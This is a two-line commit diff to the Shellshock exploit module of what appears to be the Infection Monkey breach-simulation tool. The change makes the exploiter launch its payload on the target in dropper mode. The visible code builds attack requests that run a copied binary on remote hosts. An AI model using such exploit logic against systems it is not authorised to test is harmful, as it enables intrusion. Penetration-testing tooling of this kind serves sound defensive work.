Bugfix, run Shellshock attack as dropper rather than monkey

2018-05-31 15:38:54 +03:00 · 2018-05-31 15:38:54 +03:00 · c7ed02b98e
parent 3be4f07c75
commit c7ed02b98e
1 changed files with 2 additions and 2 deletions
--- a/infection_monkey/exploit/shellshock.py
+++ b/infection_monkey/exploit/shellshock.py
@ -8,7 +8,7 @@ import requests

 from exploit import HostExploiter
 from exploit.tools import get_target_monkey, HTTPTools, get_monkey_depth
-from model import MONKEY_ARG
+from model import DROPPER_ARG
 from shellshock_resources import CGI_FILES
 from tools import build_monkey_commandline

@ -133,7 +133,7 @@ class ShellShockExploiter(HostExploiter):
            self.attack_page(url, header, run_path)

            # run the monkey
-            cmdline = "%s %s" % (dropper_target_path_linux, MONKEY_ARG)
+            cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
            cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1) + ' & '
            run_path = exploit + cmdline
            self.attack_page(url, header, run_path)